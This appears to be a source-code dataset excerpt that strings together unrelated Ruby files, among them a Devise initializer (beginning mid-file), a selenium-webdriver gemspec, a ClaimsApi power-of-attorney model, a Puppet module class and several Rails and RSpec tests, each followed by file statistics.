# ==> Configuration for any authentication mechanism
# Configure which keys are used when authenticating a user. The default is
# just :email. You can configure it to use [:username, :subdomain], so for
# authenticating a user, both parameters are required. Remember that those
# parameters are used only when authenticating and not when retrieving from
# session. If you need permissions, you should implement that in a before filter.
# You can also supply a hash where the value is a boolean determining whether
# or not authentication should be aborted when the value is not present.
# config.authentication_keys = [:email]
# Configure parameters from the request object used for authentication. Each entry
# given should be a request method and it will automatically be passed to the
# find_for_authentication method and considered in your model lookup. For instance,
# if you set :request_keys to [:subdomain], :subdomain will be used on authentication.
# The same considerations mentioned for authentication_keys also apply to request_keys.
# config.request_keys = []
# Configure which authentication keys should be case-insensitive.
# These keys will be downcased upon creating or modifying a user and when used
# to authenticate or find a user. Default is :email.
config.case_insensitive_keys = [:email]
# Configure which authentication keys should have whitespace stripped.
# These keys will have whitespace before and after removed upon creating or
# modifying a user and when used to authenticate or find a user. Default is :email.
config.strip_whitespace_keys = [:email]
# Tell if authentication through request.params is enabled. True by default.
# It can be set to an array that will enable params authentication only for the
# given strategies, for example, `config.params_authenticatable = [:database]` will
# enable it only for database (email + password) authentication.
# config.params_authenticatable = true
# Tell if authentication through HTTP Auth is enabled. False by default.
# It can be set to an array that will enable http authentication only for the
# given strategies, for example, `config.http_authenticatable = [:database]` will
# enable it only for database authentication. The supported strategies are:
# :database = Support basic authentication with authentication key + password
# config.http_authenticatable = false
# If 401 status code should be returned for AJAX requests. True by default.
# config.http_authenticatable_on_xhr = true
# The realm used in Http Basic Authentication. 'Application' by default.
# config.http_authentication_realm = 'Application'
# It will change confirmation, password recovery and other workflows
# to behave the same regardless if the e-mail provided was right or wrong.
# Does not affect registerable.
# config.paranoid = true
# By default Devise will store the user in session. You can skip storage for
# particular strategies by setting this option.
# Notice that if you are skipping storage for all authentication paths, you
# may want to disable generating routes to Devise's sessions controller by
# passing skip: :sessions to `devise_for` in your config/routes.rb
config.skip_session_storage = [:http_auth]
# By default, Devise cleans up the CSRF token on authentication to
# avoid CSRF token fixation attacks. This means that, when using AJAX
# requests for sign in and sign up, you need to get a new CSRF token
# from the server. You can disable this option at your own risk.
# config.clean_up_csrf_token_on_authentication = true
# When false, Devise will not attempt to reload routes on eager load.
# This can reduce the time taken to boot the app but if your application
# requires the Devise mappings to be loaded during boot time the application
# won't boot properly.
# config.reload_routes = true
# ==> Configuration for :database_authenticatable
# For bcrypt, this is the cost for hashing the password and defaults to 11. If
# using other algorithms, it sets how many times you want the password to be hashed.
#
# Limiting the stretches to just one in testing will increase the performance of
# your test suite dramatically. However, it is STRONGLY RECOMMENDED to not use
# a value less than 10 in other environments. Note that, for bcrypt (the default
# algorithm), the cost increases exponentially with the number of stretches (e.g.
# a value of 20 is already extremely slow: approx. 60 seconds for 1 calculation).
config.stretches = Rails.env.test? ? 1 : 11
# Set up a pepper to generate the hashed password.
# config.pepper = 'fe51198befb2428e120bb703d307f7e6aa091e6451bd8ac4bbd022fada1e4cc6b15cab1e94a8754b7b5800fc7d95914cbd817fabba21fdc8880c134aa186697b'
# Send a notification to the original email when the user's email is changed.
# config.send_email_changed_notification = false
# Send a notification email when the user's password is changed.
# config.send_password_change_notification = false
# ==> Configuration for :confirmable
# A period that the user is allowed to access the website even without
# confirming their account. For instance, if set to 2.days, the user will be
# able to access the website for two days without confirming their account,
# access will be blocked just in the third day. Default is 0.days, meaning
# the user cannot access the website without confirming their account.
# config.allow_unconfirmed_access_for = 2.days
# A period that the user is allowed to confirm their account before their
# token becomes invalid. For example, if set to 3.days, the user can confirm
# their account within 3 days after the mail was sent, but on the fourth day
# their account can't be confirmed with the token any more.
# Default is nil, meaning there is no restriction on how long a user can take
# before confirming their account.
# config.confirm_within = 3.days
# If true, requires any email changes to be confirmed (exactly the same way as
# initial account confirmation) to be applied. Requires additional unconfirmed_email
# db field (see migrations). Until confirmed, new email is stored in
# unconfirmed_email column, and copied to email column on successful confirmation.
config.reconfirmable = true
# Defines which key will be used when confirming an account
# config.confirmation_keys = [:email]
# ==> Configuration for :rememberable
# The time the user will be remembered without asking for credentials again.
# config.remember_for = 2.weeks
# Invalidates all the remember me tokens when the user signs out.
config.expire_all_remember_me_on_sign_out = true
# If true, extends the user's remember period when remembered via cookie.
# config.extend_remember_period = false
# Options to be passed to the created cookie. For instance, you can set
# secure: true in order to force SSL only cookies.
# config.rememberable_options = {}
# ==> Configuration for :validatable
# Range for password length.
config.password_length = 6..128
# Email regex used to validate email formats. It simply asserts that
# one (and only one) @ exists in the given string. This is mainly
# to give user feedback and not to assert the e-mail validity.
config.email_regexp = /\A[^@\s]+@[^@\s]+\z/
# ==> Configuration for :timeoutable
# The time you want to timeout the user session without activity. After this
# time the user will be asked for credentials again. Default is 30 minutes.
# config.timeout_in = 30.minutes
# ==> Configuration for :lockable
# Defines which strategy will be used to lock an account.
# :failed_attempts = Locks an account after a number of failed attempts to sign in.
# :none = No lock strategy. You should handle locking by yourself.
# config.lock_strategy = :failed_attempts
# Defines which key will be used when locking and unlocking an account
# config.unlock_keys = [:email]
# Defines which strategy will be used to unlock an account.
# :email = Sends an unlock link to the user email
# :time = Re-enables login after a certain amount of time (see :unlock_in below)
# :both = Enables both strategies
# :none = No unlock strategy. You should handle unlocking by yourself.
# config.unlock_strategy = :both
# Number of authentication tries before locking an account if lock_strategy
# is failed attempts.
# config.maximum_attempts = 20
# Time interval to unlock the account if :time is enabled as unlock_strategy.
# config.unlock_in = 1.hour
# Warn on the last attempt before the account is locked.
# config.last_attempt_warning = true
# ==> Configuration for :recoverable
#
# Defines which key will be used when recovering the password for an account
# config.reset_password_keys = [:email]
# Time interval you can reset your password with a reset password key.
# Don't put a too small interval or your users won't have the time to
# change their passwords.
config.reset_password_within = 6.hours
# When set to false, does not sign a user in automatically after their password is
# reset. Defaults to true, so a user is signed in automatically after a reset.
# config.sign_in_after_reset_password = true
# ==> Configuration for :encryptable
# Allow you to use another hashing or encryption algorithm besides bcrypt (default).
# You can use :sha1, :sha512 or algorithms from others authentication tools as
# :clearance_sha1, :authlogic_sha512 (then you should set stretches above to 20
# for default behavior) and :restful_authentication_sha1 (then you should set
# stretches to 10, and copy REST_AUTH_SITE_KEY to pepper).
#
# Require the `devise-encryptable` gem when using anything other than bcrypt
# config.encryptor = :sha512
# ==> Scopes configuration
# Turn scoped views on. Before rendering "sessions/new", it will first check for
# "users/sessions/new". It's turned off by default because it's slower if you
# are using only default views.
# config.scoped_views = false
# Configure the default scope given to Warden. By default it's the first
# devise role declared in your routes (usually :user).
# config.default_scope = :user
# Set this configuration to false if you want /users/sign_out to sign out
# only the current scope. By default, Devise signs out all scopes.
# config.sign_out_all_scopes = true
# ==> Navigation configuration
# Lists the formats that should be treated as navigational. Formats like
# :html, should redirect to the sign in page when the user does not have
# access, but formats like :xml or :json, should return 401.
#
# If you have any extra navigational formats, like :iphone or :mobile, you
# should add them to the navigational formats lists.
#
# The "*/*" below is required to match Internet Explorer requests.
# config.navigational_formats = ['*/*', :html]
# The default HTTP method used to sign out a resource. Default is :delete.
config.sign_out_via = :delete
# ==> OmniAuth
# Add a new OmniAuth provider. Check the wiki for more information on setting
# up on your models and hooks.
# config.omniauth :github, 'APP_ID', 'APP_SECRET', scope: 'user,public_repo'
# ==> Warden configuration
# If you want to use other strategies, that are not supported by Devise, or
# change the failure app, you can configure them inside the config.warden block.
#
# config.warden do |manager|
# manager.intercept_401 = false
# manager.default_strategies(scope: :user).unshift :some_external_strategy
# end
# ==> Mountable engine configurations
# When using Devise inside an engine, let's call it `MyEngine`, and this engine
# is mountable, there are some extra configurations to be taken into account.
# The following options are available, assuming the engine is mounted as:
#
# mount MyEngine, at: '/my_engine'
#
# The router that invoked `devise_for`, in the example above, would be:
# config.router_name = :my_engine
#
# When using OmniAuth, Devise cannot automatically set OmniAuth path,
# so you need to do it manually. For the users scope, it would be:
# config.omniauth_path_prefix = '/my_engine/users/auth'
end
| 49.071942 | 154 | 0.751356 |
6154ff25f5a62641f296b1c754ebcea0cbbd90bd | 488 | module MotionKit
module_function
def objective_c_method_name(str)
str.split('_').inject([]) { |buffer,e| buffer.push(buffer.empty? ? e : e.capitalize) }.join
end
def camel_case(str)
str.split('_').map(&:capitalize).join
end
def setter(method_name)
setter = "set#{method_name[0].capitalize}#{method_name[1..-1]}"
unless setter.end_with?(':')
setter << ':'
end
setter
end
def appearance_class
@appearance_class ||= Class.new
end
end
| 19.52 | 95 | 0.64959 |
b9108dd9b02d50391b6a1c1eb11c5cd3db16e930 | 2,668 | # -*- encoding: utf-8 -*-
# stub: selenium-webdriver 3.14.0 ruby lib
Gem::Specification.new do |s|
s.name = "selenium-webdriver".freeze
s.version = "3.14.0"
s.required_rubygems_version = Gem::Requirement.new("> 1.3.1".freeze) if s.respond_to? :required_rubygems_version=
s.metadata = { "changelog_uri" => "https://github.com/SeleniumHQ/selenium/blob/master/rb/CHANGES", "source_code_uri" => "https://github.com/SeleniumHQ/selenium/tree/master/rb" } if s.respond_to? :metadata=
s.require_paths = ["lib".freeze]
s.authors = ["Alex Rodionov".freeze, "Titus Fortner".freeze]
s.date = "2018-08-03"
s.description = "WebDriver is a tool for writing automated tests of websites. It aims to mimic the behaviour of a real user, and as such interacts with the HTML of the application.".freeze
s.email = ["[email protected]".freeze, "[email protected]".freeze]
s.homepage = "https://github.com/SeleniumHQ/selenium".freeze
s.licenses = ["Apache-2.0".freeze]
s.required_ruby_version = Gem::Requirement.new(">= 2.0".freeze)
s.rubygems_version = "2.5.2.3".freeze
s.summary = "The next generation developer focused tool for automated testing of webapps".freeze
s.installed_by_version = "2.5.2.3" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_runtime_dependency(%q<rubyzip>.freeze, ["~> 1.2"])
s.add_runtime_dependency(%q<childprocess>.freeze, ["~> 0.5"])
s.add_development_dependency(%q<rspec>.freeze, ["~> 3.0"])
s.add_development_dependency(%q<rack>.freeze, ["~> 1.0"])
s.add_development_dependency(%q<webmock>.freeze, ["~> 2.0"])
s.add_development_dependency(%q<yard>.freeze, ["~> 0.9.11"])
s.add_development_dependency(%q<rubocop>.freeze, ["~> 0.50.0"])
else
s.add_dependency(%q<rubyzip>.freeze, ["~> 1.2"])
s.add_dependency(%q<childprocess>.freeze, ["~> 0.5"])
s.add_dependency(%q<rspec>.freeze, ["~> 3.0"])
s.add_dependency(%q<rack>.freeze, ["~> 1.0"])
s.add_dependency(%q<webmock>.freeze, ["~> 2.0"])
s.add_dependency(%q<yard>.freeze, ["~> 0.9.11"])
s.add_dependency(%q<rubocop>.freeze, ["~> 0.50.0"])
end
else
s.add_dependency(%q<rubyzip>.freeze, ["~> 1.2"])
s.add_dependency(%q<childprocess>.freeze, ["~> 0.5"])
s.add_dependency(%q<rspec>.freeze, ["~> 3.0"])
s.add_dependency(%q<rack>.freeze, ["~> 1.0"])
s.add_dependency(%q<webmock>.freeze, ["~> 2.0"])
s.add_dependency(%q<yard>.freeze, ["~> 0.9.11"])
s.add_dependency(%q<rubocop>.freeze, ["~> 0.50.0"])
end
end
| 50.339623 | 207 | 0.661169 |
5dc3841ed98c330fd9fb834f46b44dbad8baec8d | 1,390 | module Billy
class Skill
ATTRIBUTES = [:name, :internal_location, :external_location]
attr_accessor *ATTRIBUTES
def initialize(config = {})
config.each { |k,v| public_send("#{k}=",v) }
end
def to_s
name
end
def to_h
ATTRIBUTES.each_with_object({}) do |attribute, hash|
hash[attribute] = public_send(attribute)
end
end
def module
module_from_string(name)
end
def tasks
return @tasks if @tasks
require internal_location if internal_location
methods = self.module.instance_methods - Object.new.methods
@tasks = methods.map { |method| Task.new(name: method, skill: self) }
end
def default_task
tasks.first
end
def has_a_task?(name)
!!find_task(name)
end
def find_task(name)
tasks.detect{ |task| task.name.to_s.downcase == name.to_s.downcase }
end
def documentation?
!!has_a_task?(:documentation)
end
def documentation(*args)
execute_task(:documentation, self, *args)
end
def execute_task(name, *args)
m = Module.new
require internal_location
m.extend(self.module)
m.send(name, *args)
end
private
def module_from_string(str)
str.split('::').inject(Object) do |mod, module_name|
mod.const_get(module_name)
end
end
end
end | 19.857143 | 75 | 0.620863 |
b9e81acf79dfa89a7a9de1b023ca3898a2ab60b8 | 1,781 | # frozen_string_literal: true
require_dependency 'claims_api/json_marshal'
require_dependency 'claims_api/concerns/file_data'
module ClaimsApi
class PowerOfAttorney < ApplicationRecord
include FileData
attr_encrypted(:form_data, key: Settings.db_encryption_key, marshal: true, marshaler: ClaimsApi::JsonMarshal)
attr_encrypted(:auth_headers, key: Settings.db_encryption_key, marshal: true, marshaler: ClaimsApi::JsonMarshal)
attr_encrypted(:source_data, key: Settings.db_encryption_key, marshal: true, marshaler: ClaimsApi::JsonMarshal)
PENDING = 'pending'
UPDATED = 'updated'
ERRORED = 'errored'
before_validation :set_md5
validates :md5, uniqueness: true
def date_request_accepted
created_at&.to_date.to_s
end
def representative
form_data.merge(participant_id: nil)
end
def veteran
{ participant_id: nil }
end
def previous_poa
current_poa
end
def set_md5
headers = auth_headers.except('va_eauth_authenticationauthority',
'va_eauth_service_transaction_id',
'va_eauth_issueinstant',
'Authorization')
self.header_md5 = Digest::MD5.hexdigest headers.to_json
self.md5 = Digest::MD5.hexdigest form_data.merge(headers).to_json
end
def uploader
@uploader ||= ClaimsApi::PowerOfAttorneyUploader.new(id)
end
def external_key
source_data.present? ? source_data['email'] : Settings.bgs.external_key
end
def external_uid
source_data.present? ? source_data['icn'] : Settings.bgs.external_uid
end
def self.pending?(id)
query = where(id: id)
query.exists? ? query.first : false
end
end
end
| 28.269841 | 116 | 0.679955 |
1d41415b7fcb1ffc2d97a9760bdec25cb04e3b6e | 2,934 | require 'test_helper'
class SetSubscriptionsForItemJobTest < ActiveSupport::TestCase
fixtures :all
def setup
User.current_user = Factory(:user)
end
test 'perform for datafile' do
person1 = Factory(:person)
person2 = Factory(:person)
subscribable = nil
# when subscribable is created, SetSubscriptionsForItemJob is also created
assert_enqueued_with(job: SetSubscriptionsForItemJob) do
subscribable = Factory(:data_file, policy: Factory(:public_policy))
end
assert_equal 1, subscribable.projects.count
project_subscription1 = person1.project_subscriptions.create project: subscribable.projects.first, frequency: 'weekly'
project_subscription2 = person2.project_subscriptions.create project: subscribable.projects.first, frequency: 'weekly'
assert !subscribable.subscribed?(person1)
assert !subscribable.subscribed?(person2)
SetSubscriptionsForItemJob.perform_now(subscribable, subscribable.projects)
subscribable.reload
assert subscribable.subscribed? person1
assert subscribable.subscribed? person2
end
test 'perform for assay' do
person1 = Factory(:person)
person2 = Factory(:person)
subscribable = nil
# when subscribable is created, SetSubscriptionsForItemJob is also created
assert_enqueued_with(job: SetSubscriptionsForItemJob) do
subscribable = Factory(:assay, policy: Factory(:public_policy))
end
assert_equal 1, subscribable.projects.count
project_subscription1 = person1.project_subscriptions.create project: subscribable.projects.first, frequency: 'weekly'
project_subscription2 = person2.project_subscriptions.create project: subscribable.projects.first, frequency: 'weekly'
assert !subscribable.subscribed?(person1)
assert !subscribable.subscribed?(person2)
SetSubscriptionsForItemJob.perform_now(subscribable, subscribable.projects)
subscribable.reload
assert subscribable.subscribed? person1
assert subscribable.subscribed? person2
end
test 'perform for study' do
person1 = Factory(:person)
person2 = Factory(:person)
subscribable = nil
# when subscribable is created, SetSubscriptionsForItemJob is also created
assert_enqueued_with(job: SetSubscriptionsForItemJob) do
subscribable = Factory(:study, policy: Factory(:public_policy))
end
assert_equal 1, subscribable.projects.count
project_subscription1 = person1.project_subscriptions.create project: subscribable.projects.first, frequency: 'weekly'
project_subscription2 = person2.project_subscriptions.create project: subscribable.projects.first, frequency: 'weekly'
assert !subscribable.subscribed?(person1)
assert !subscribable.subscribed?(person2)
SetSubscriptionsForItemJob.perform_now(subscribable, subscribable.projects)
subscribable.reload
assert subscribable.subscribed? person1
assert subscribable.subscribed? person2
end
end
| 38.605263 | 122 | 0.777437 |
1c88eaa9f80020dd762e73dbc4bf082bc6758ede | 358 | require 'helper'
class TestUtils < Test::Unit::TestCase
def test_blank
assert EmailVeracity::Utils.blank?([]), '[] should be blank.'
assert EmailVeracity::Utils.blank?(''), '"" should be blank.'
assert EmailVeracity::Utils.blank?(Hash.new), '{} should be blank.'
assert EmailVeracity::Utils.blank?(nil), 'nil should be blank.'
end
end
| 27.538462 | 71 | 0.678771 |
e8425d8ea005f325227597180013d2affe0431ae | 100 | # frozen_string_literal: true
class ImageOptim
class ConfigurationError < StandardError; end
end
| 16.666667 | 47 | 0.82 |
e2e41cccf06498e23cfc379ffdc5f70f4fe0be14 | 2,196 | require 'test_helper'
class UserTest < ActiveSupport::TestCase
def setup
@user = User.new name: 'Example User', email: '[email protected]',
password: 'foobar', password_confirmation: 'foobar'
end
test 'should be valid' do
assert @user.valid?
end
test 'name should be present' do
@user.name = ''
assert_not @user.valid?
end
test 'email should be present' do
@user.email = ' ' * 6
assert_not @user.valid?
end
test 'name should not be too long' do
@user.name = 'a' * 51
assert_not @user.valid?
end
test 'email should not be too long' do
@user.email = 'a' * 244 + '@example.com'
assert_not @user.valid?
end
test 'email validation should accept valid addresses' do
valid_adresses = %w[[email protected] [email protected] [email protected]
[email protected] [email protected]]
valid_adresses.each do |valid_adress|
@user.email = valid_adress
assert @user.valid?, "#{valid_adress.inspect} should be valid"
end
end
test 'email validation should reject invalid addresses' do
invalid_adresses = %w[user@example,com user_at_foo.org user.name@example.
foo@bar_baz.com foo@bar+baz.com [email protected]]
invalid_adresses.each do |invalid_adress|
@user.email = invalid_adress
assert_not @user.valid?, "#{invalid_adress.inspect} should be invalid"
end
end
test 'email addresses should be unique' do
duplicate_user = @user.dup
@user.save
assert_not duplicate_user.valid?
end
test 'email addresses should be saved as lower-case' do
mixed_case_email = '[email protected]'
@user.email = mixed_case_email
@user.save
assert_equal mixed_case_email.downcase, @user.reload.email
end
test 'password should be present (nonblank)' do
@user.password = @user.password_confirmation = ' ' * 6
assert_not @user.valid?
end
test 'password should have a minimum length' do
@user.password = @user.password_confirmation = 'a' * 5
assert_not @user.valid?
end
test 'authenticated? should return false for a user with nil digest' do
assert_not @user.authenticated?('')
end
end
| 28.153846 | 77 | 0.67031 |
e927f562bd4b460534be5084e3750803d29c794e | 400 | cask 'neo4j' do
# note: "4" is not a version number, but an intrinsic part of the product name
version '1.2.9'
sha256 '2e26dfe20e98286dd7871235c39d8a077d9f53e2971997731e0592a60313b16a'
url "https://neo4j.com/artifact.php?name=neo4j-desktop-#{version}.dmg"
appcast 'https://neo4j.com/download/'
name 'Neo4j Desktop'
homepage 'https://neo4j.com/download/'
app 'Neo4j Desktop.app'
end
| 30.769231 | 80 | 0.74 |
bb8019e4006c09c18371a226c97b9665277a99c7 | 213 | require 'pry'
RSpec.configure do |config|
config.treat_symbols_as_metadata_keys_with_true_values = true
config.run_all_when_everything_filtered = true
config.filter_run :focus
config.order = 'random'
end
| 23.666667 | 63 | 0.807512 |
624d69126b58f9f9b777fd9dfa6b4613973dde35 | 118 | class AddUserIdToSong < ActiveRecord::Migration[5.0]
def change
add_column :songs, :user_id, :integer
end
end
| 19.666667 | 52 | 0.737288 |
bbe4c60faa243ea2e95a05effedeeb7402a27e9f | 903 | # frozen_string_literal: true
class ApplicationController < ActionController::Base
protect_from_forgery with: :exception
before_action :require_login, :active_user?
skip_before_action :active_user?, only: [:clearance]
helper_method :logged_in?, :current_user
def current_user
User.find_by(id: session[:user_id])
end
def logged_in?
current_user.present?
end
def clearance
return redirect_to passages_path if current_user.active
render 'shared/clearance', layout: false
end
def verify_privileges(action, subject_class)
authorize! action.to_sym, subject_class
end
rescue_from CanCan::AccessDenied do |exception|
raise ActionController::RoutingError, "#{exception.message}"
end
private
def active_user?
redirect_to clearance_url unless current_user.active
end
def require_login
redirect_to login_url unless logged_in?
end
end
| 21.5 | 64 | 0.76412 |
ab6f456bf2f07b824e8f4b497f89f3a16e1ed50f | 867 | Pod::Spec.new do |s|
s.name = "FMDB"
s.version = "4.0.2"
s.summary = "A Cocoa / Objective-C wrapper around SQLite - Salesforce Mobile SDK fork"
s.homepage = "https://github.com/ccgus/fmdb"
s.license = "MIT"
s.author = { "August Mueller" => "[email protected]" }
s.platform = :ios, "8.0"
s.source = { :git => "https://github.com/forcedotcom/SalesforceMobileSDK-iOS.git",
:tag => "pod_v#{s.version}",
:submodules => true }
s.requires_arc = true
s.default_subspec = 'FMDB'
s.subspec 'FMDB' do |fmdb|
fmdb.source_files = 'external/fmdb/src/fmdb/FM*.{h,m}'
fmdb.exclude_files = 'external/fmdb/src/fmdb.m'
fmdb.xcconfig = { 'OTHER_CFLAGS' => '$(inherited) -DSQLITE_HAS_CODEC' }
fmdb.dependency 'SQLCipher/fts', '~> 3.3.1'
end
end
| 29.896552 | 93 | 0.574394 |
62ec8435819fb294411135e04a75375cbad9ff45 | 220 | # Change multipart limit from 128 (default) to unlimited
# http://stackoverflow.com/questions/27773368/rails-4-2-internal-server-error-with-maximum-file-multiparts-in-content-reached
Rack::Utils.multipart_part_limit = 0
| 55 | 125 | 0.813636 |
268b435cf02a46f22176bd7afed8b2829df43a27 | 10,110 | require 'puppet/util/logging'
require 'semver'
require 'json'
# Support for modules
class Puppet::Module
class Error < Puppet::Error; end
class MissingModule < Error; end
class IncompatibleModule < Error; end
class UnsupportedPlatform < Error; end
class IncompatiblePlatform < Error; end
class MissingMetadata < Error; end
class InvalidName < Error; end
class InvalidFilePattern < Error; end
include Puppet::Util::Logging
FILETYPES = {
"manifests" => "manifests",
"files" => "files",
"templates" => "templates",
"plugins" => "lib",
"pluginfacts" => "facts.d",
}
# Find and return the +module+ that +path+ belongs to. If +path+ is
# absolute, or if there is no module whose name is the first component
# of +path+, return +nil+
def self.find(modname, environment = nil)
return nil unless modname
# Unless a specific environment is given, use the current environment
env = environment ? Puppet.lookup(:environments).get!(environment) : Puppet.lookup(:current_environment)
env.module(modname)
end
def self.is_module_directory?(name, path)
# it must be a directory
fullpath = File.join(path, name)
return false unless Puppet::FileSystem.directory?(fullpath)
return is_module_directory_name?(name)
end
def self.is_module_directory_name?(name)
# it must match an installed module name according to forge validator
return true if name =~ /^[a-z][a-z0-9_]*$/
return false
end
def self.is_module_namespaced_name?(name)
# it must match the full module name according to forge validator
return true if name =~ /^[a-zA-Z0-9]+[-][a-z][a-z0-9_]*$/
return false
end
attr_reader :name, :environment, :path, :metadata
attr_writer :environment
attr_accessor :dependencies, :forge_name
attr_accessor :source, :author, :version, :license, :summary, :description, :project_page
def initialize(name, path, environment)
@name = name
@path = path
@environment = environment
assert_validity
load_metadata if has_metadata?
@absolute_path_to_manifests = Puppet::FileSystem::PathPattern.absolute(manifests)
end
# @deprecated The puppetversion module metadata field is no longer used.
def puppetversion
nil
end
# @deprecated The puppetversion module metadata field is no longer used.
def puppetversion=(something)
end
# @deprecated The puppetversion module metadata field is no longer used.
def validate_puppet_version
return
end
def has_metadata?
return false unless metadata_file
return false unless Puppet::FileSystem.exist?(metadata_file)
begin
metadata = JSON.parse(File.read(metadata_file))
rescue JSON::JSONError => e
Puppet.debug("#{name} has an invalid and unparsable metadata.json file. The parse error: #{e.message}")
return false
end
return metadata.is_a?(Hash) && !metadata.keys.empty?
end
FILETYPES.each do |type, location|
# A boolean method to let external callers determine if
# we have files of a given type.
define_method(type +'?') do
type_subpath = subpath(location)
unless Puppet::FileSystem.exist?(type_subpath)
Puppet.debug("No #{type} found in subpath '#{type_subpath}' " +
"(file / directory does not exist)")
return false
end
return true
end
# A method for returning a given file of a given type.
# e.g., file = mod.manifest("my/manifest.pp")
#
# If the file name is nil, then the base directory for the
# file type is passed; this is used for fileserving.
define_method(type.sub(/s$/, '')) do |file|
# If 'file' is nil then they're asking for the base path.
# This is used for things like fileserving.
if file
full_path = File.join(subpath(location), file)
else
full_path = subpath(location)
end
return nil unless Puppet::FileSystem.exist?(full_path)
return full_path
end
# Return the base directory for the given type
define_method(type) do
subpath(location)
end
end
def license_file
return @license_file if defined?(@license_file)
return @license_file = nil unless path
@license_file = File.join(path, "License")
end
def load_metadata
@metadata = data = JSON.parse(File.read(metadata_file))
@forge_name = data['name'].gsub('-', '/') if data['name']
[:source, :author, :version, :license, :dependencies].each do |attr|
unless value = data[attr.to_s]
raise MissingMetadata, "No #{attr} module metadata provided for #{self.name}"
end
if attr == :dependencies
unless value.is_a?(Array)
raise MissingMetadata, "The value for the key dependencies in the file metadata.json of the module #{self.name} must be an array, not: '#{value}'"
end
value.each do |dep|
name = dep['name']
dep['name'] = name.tr('-', '/') unless name.nil?
dep['version_requirement'] ||= '>= 0.0.0'
end
end
send(attr.to_s + "=", value)
end
end
# Return the list of manifests matching the given glob pattern,
# defaulting to 'init.pp' for empty modules.
def match_manifests(rest)
if rest
wanted_manifests = wanted_manifests_from(rest)
searched_manifests = wanted_manifests.glob.reject { |f| FileTest.directory?(f) }
else
searched_manifests = []
end
# (#4220) Always ensure init.pp in case class is defined there.
init_manifest = manifest("init.pp")
if !init_manifest.nil? && !searched_manifests.include?(init_manifest)
searched_manifests.unshift(init_manifest)
end
searched_manifests
end
def all_manifests
return [] unless Puppet::FileSystem.exist?(manifests)
Dir.glob(File.join(manifests, '**', '*.pp'))
end
def metadata_file
return @metadata_file if defined?(@metadata_file)
return @metadata_file = nil unless path
@metadata_file = File.join(path, "metadata.json")
end
def modulepath
File.dirname(path) if path
end
# Find all plugin directories. This is used by the Plugins fileserving mount.
def plugin_directory
subpath("lib")
end
def plugin_fact_directory
subpath("facts.d")
end
def has_external_facts?
File.directory?(plugin_fact_directory)
end
def supports(name, version = nil)
@supports ||= []
@supports << [name, version]
end
def to_s
result = "Module #{name}"
result += "(#{path})" if path
result
end
def dependencies_as_modules
dependent_modules = []
dependencies and dependencies.each do |dep|
author, dep_name = dep["name"].split('/')
found_module = environment.module(dep_name)
dependent_modules << found_module if found_module
end
dependent_modules
end
def required_by
environment.module_requirements[self.forge_name] || {}
end
# Identify and mark unmet dependencies. A dependency will be marked unmet
# for the following reasons:
#
# * not installed and is thus considered missing
# * installed and does not meet the version requirements for this module
# * installed and doesn't use semantic versioning
#
# Returns a list of hashes representing the details of an unmet dependency.
#
# Example:
#
# [
# {
# :reason => :missing,
# :name => 'puppetlabs-mysql',
# :version_constraint => 'v0.0.1',
# :mod_details => {
# :installed_version => '0.0.1'
# }
# :parent => {
# :name => 'puppetlabs-bacula',
# :version => 'v1.0.0'
# }
# }
# ]
#
def unmet_dependencies
unmet_dependencies = []
return unmet_dependencies unless dependencies
dependencies.each do |dependency|
name = dependency['name']
version_string = dependency['version_requirement'] || '>= 0.0.0'
dep_mod = begin
environment.module_by_forge_name(name)
rescue
nil
end
error_details = {
:name => name,
:version_constraint => version_string.gsub(/^(?=\d)/, "v"),
:parent => {
:name => self.forge_name,
:version => self.version.gsub(/^(?=\d)/, "v")
},
:mod_details => {
:installed_version => dep_mod.nil? ? nil : dep_mod.version
}
}
unless dep_mod
error_details[:reason] = :missing
unmet_dependencies << error_details
next
end
if version_string
begin
required_version_semver_range = SemVer[version_string]
actual_version_semver = SemVer.new(dep_mod.version)
rescue ArgumentError
error_details[:reason] = :non_semantic_version
unmet_dependencies << error_details
next
end
unless required_version_semver_range.include? actual_version_semver
error_details[:reason] = :version_mismatch
unmet_dependencies << error_details
next
end
end
end
unmet_dependencies
end
def ==(other)
self.name == other.name &&
self.version == other.version &&
self.path == other.path &&
self.environment == other.environment
end
private
def wanted_manifests_from(pattern)
begin
extended = File.extname(pattern).empty? ? "#{pattern}.pp" : pattern
relative_pattern = Puppet::FileSystem::PathPattern.relative(extended)
rescue Puppet::FileSystem::PathPattern::InvalidPattern => error
raise Puppet::Module::InvalidFilePattern.new(
"The pattern \"#{pattern}\" to find manifests in the module \"#{name}\" " +
"is invalid and potentially unsafe.", error)
end
relative_pattern.prefix_with(@absolute_path_to_manifests)
end
def subpath(type)
File.join(path, type)
end
def assert_validity
if !Puppet::Module.is_module_directory_name?(@name) && !Puppet::Module.is_module_namespaced_name?(@name)
raise InvalidName, "Invalid module name #{@name}; module names must be alphanumeric (plus '-'), not '#{@name}'"
end
end
end
| 28.398876 | 156 | 0.654303 |
ababb38bc79ba7c755892fe590c472238a249ec4 | 1,895 | require 'spec_helper'
require 'mspec/expectations/expectations'
require 'mspec/matchers'
shared_examples_for "have_instance_variable, on all Ruby versions" do
after :all do
Object.const_set :RUBY_VERSION, @ruby_version
end
it "matches when object has the instance variable, given as string" do
matcher = HaveInstanceVariableMatcher.new('@foo')
matcher.matches?(@object).should be_true
end
it "matches when object has the instance variable, given as symbol" do
matcher = HaveInstanceVariableMatcher.new(:@foo)
matcher.matches?(@object).should be_true
end
it "does not match when object hasn't got the instance variable, given as string" do
matcher = HaveInstanceVariableMatcher.new('@bar')
matcher.matches?(@object).should be_false
end
it "does not match when object hasn't got the instance variable, given as symbol" do
matcher = HaveInstanceVariableMatcher.new(:@bar)
matcher.matches?(@object).should be_false
end
it "provides a failure message for #should" do
matcher = HaveInstanceVariableMatcher.new(:@bar)
matcher.matches?(@object)
matcher.failure_message.should == [
"Expected #{@object.inspect} to have instance variable '@bar'",
"but it does not"
]
end
it "provides a failure messoge for #should_not" do
matcher = HaveInstanceVariableMatcher.new(:@bar)
matcher.matches?(@object)
matcher.negative_failure_message.should == [
"Expected #{@object.inspect} NOT to have instance variable '@bar'",
"but it does"
]
end
end
describe HaveInstanceVariableMatcher, "on RUBY_VERSION >= 1.9" do
before :all do
@ruby_version = Object.const_get :RUBY_VERSION
Object.const_set :RUBY_VERSION, '1.9.0'
@object = Object.new
def @object.instance_variables
[:@foo]
end
end
it_should_behave_like "have_instance_variable, on all Ruby versions"
end
| 30.564516 | 86 | 0.722427 |
